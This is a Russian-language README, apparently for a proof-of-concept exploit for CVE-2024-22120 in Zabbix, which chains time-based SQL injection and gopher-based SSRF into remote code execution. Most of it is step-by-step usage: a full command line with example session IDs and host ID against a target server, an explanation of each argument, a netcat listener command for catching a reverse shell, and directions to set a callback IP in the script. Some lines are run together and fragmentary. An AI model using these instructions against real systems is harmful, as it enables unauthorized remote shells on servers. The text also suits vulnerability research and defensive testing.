
Эксплойт proof-of-concept для CVE-2024-22120, использующий SQL-инъекцию на основе времени и SSRF на основе gopher для достижения удаленного выполнения кода на уязвимых серверах Zabbix в образовательных целях исследования безопасности.
python exploit.py --ip <Zabbix_IP> --sid <LowPrivileged_SID> --hostid <HostID> --phpsessid <PHPSESSID> --false_time <FalseTime> --true_time <TrueTime>
Вы обнаружили сервер Zabbix, работающий по IP 192.168.1.100, и у вас есть доступ к низкопривилегированному пользователю со следующими данными:
sid): d82bf6715e1d3c1f25hostid): 10107phpsessid): a4g7f48d9j3r7h8s9gВы хотите использовать данную уязвимость RCE с помощью этого скрипта.
python exploit.py --ip 192.168.1.100 --sid d82bf6715e1d3c1f25 --hostid 10107 --phpsessid a4g7f48d9j3r7h8s9g --false_time 1 --true_time 3
--ip 192.168.1.100: IP-адрес сервера Zabbix.--sid d82bf6715e1d3c1f25: Идентификатор сессии низкопривилегированного пользователя.--hostid 10107: Идентификатор хоста, к которому имеет доступ низкопривилегированный пользователь.--phpsessid a4g7f48d9j3r7h8s9g: PHP идентификатор сессии, используемый для аутентификации запросов.--false_time 1: Время в секундах для задержки в случае неверного предположения при SQL-инъекции (по умолчанию 1 секунда).--true_time 3: Время в секундах для задержки в случае верного предположения при SQL-инъекции (по умолчанию 3 секунды).10.0.46.27:5555 в скрипте).Убедитесь, что ваша машина прослушивает указанный порт (5555 в скрипте) для получения обратной оболочки. Для этого можно использовать netcat:
nc -lvnp 5555
Замените IP 10.0.46.27 и порт 5555 в функции CreateScript на ваш собственный IP и желаемый порт для получения обратной оболочки.